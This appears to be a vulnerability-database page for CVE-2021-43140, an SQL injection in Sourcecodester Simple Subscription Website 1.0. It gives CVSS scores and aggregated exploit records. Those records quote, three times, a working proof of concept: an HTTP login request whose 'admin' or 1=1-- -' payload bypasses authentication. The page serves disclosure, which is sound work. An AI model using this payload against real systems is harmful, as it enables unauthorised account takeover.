CVE-2021-43140

2021-11-03T19:15:00

Description

SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. via the login.

Affected Software

CPE Name	Name	Version
simple_subscription_website_project:simple_subscription_website	simple subscription website project simple subscription website	1.0

{"id": "CVE-2021-43140", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-43140", "description": "SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. via the login.", "published": "2021-11-03T19:15:00", "modified": "2021-11-17T02:36:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43140", "reporter": "cve@mitre.org", "references": ["https://github.com/Dir0x/CVE-2021-43140", "http://packetstormsecurity.com/files/164968/Simple-Subscription-Website-1.0-SQL-Injection.html", "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-43140"], "cvelist": ["CVE-2021-43140"], "immutableFields": [], "lastseen": "2022-03-23T19:38:29", "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50522"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164968"]}, {"type": "zdt", "idList": ["1337DAY-ID-37042"]}], "rev": 4}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50522"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164968"]}, {"type": "zdt", "idList": ["1337DAY-ID-37042"]}]}, "exploitation": null, "vulnersScore": 4.2}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:simple_subscription_website_project:simple_subscription_website:1.0"], "cpe23": ["cpe:2.3:a:simple_subscription_website_project:simple_subscription_website:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "simple_subscription_website_project:simple_subscription_website", "version": "1.0", "operator": "eq", "name": "simple subscription website project simple subscription website"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:simple_subscription_website_project:simple_subscription_website:1.0:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/Dir0x/CVE-2021-43140", "name": "https://github.com/Dir0x/CVE-2021-43140", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164968/Simple-Subscription-Website-1.0-SQL-Injection.html", "name": "http://packetstormsecurity.com/files/164968/Simple-Subscription-Website-1.0-SQL-Injection.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-43140", "name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-43140", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"zdt": [{"lastseen": "2021-12-04T15:48:12", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-15T00:00:00", "type": "zdt", "title": "Simple Subscription Website 1.0 - SQL injection Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43140"], "modified": "2021-11-15T00:00:00", "id": "1337DAY-ID-37042", "href": "https://0day.today/exploit/description/37042", "sourceData": "# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass\n# Exploit Author: Daniel Haro (Dirox)\n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\n# Version: Simple Subscription Website 1.0\n# Tested on: Windows, xampp\n# CVE: CVE-2021-43140\n\n- Description:\nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -\n\nPoC:\n\nPOST /plan_application/Actions.php?a=login HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 57\nOrigin: http://127.0.0.1\nConnection: close\nReferer: http://127.0.0.1/plan_application/admin/login.php\nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3\n\nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-\n", "sourceHref": "https://0day.today/exploit/37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-11-15T21:42:41", "description": "", "cvss3": {}, "published": "2021-11-15T00:00:00", "type": "packetstorm", "title": "Simple Subscription Website 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-43140"], "modified": "2021-11-15T00:00:00", "id": "PACKETSTORM:164968", "href": "https://packetstormsecurity.com/files/164968/Simple-Subscription-Website-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass \n# Exploit Author: Daniel Haro (Dirox) \n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html \n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html \n# Version: Simple Subscription Website 1.0 \n# Tested on: Windows, xampp \n# CVE: CVE-2021-43140 \n \n- Description: \nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- - \n \nPoC: \n \nPOST /plan_application/Actions.php?a=login HTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 57 \nOrigin: http://127.0.0.1 \nConnection: close \nReferer: http://127.0.0.1/plan_application/admin/login.php \nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3 \n \nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164968/ssw10-sql.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:34:27", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-15T00:00:00", "type": "exploitdb", "title": "Simple Subscription Website 1.0 - SQLi Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-43140", "CVE-2021-43140"], "modified": "2021-11-15T00:00:00", "id": "EDB-ID:50522", "href": "https://www.exploit-db.com/exploits/50522", "sourceData": "# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass\r\n# Exploit Author: Daniel Haro (Dirox)\r\n# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\r\n# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html\r\n# Version: Simple Subscription Website 1.0\r\n# Tested on: Windows, xampp\r\n# CVE: CVE-2021-43140\r\n\r\n- Description:\r\nSQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -\r\n\r\nPoC:\r\n\r\nPOST /plan_application/Actions.php?a=login HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 57\r\nOrigin: http://127.0.0.1\r\nConnection: close\r\nReferer: http://127.0.0.1/plan_application/admin/login.php\r\nCookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3\r\n\r\nusername=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-", "sourceHref": "https://www.exploit-db.com/download/50522", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

CVE-2021-43140

Description

Affected Software

Related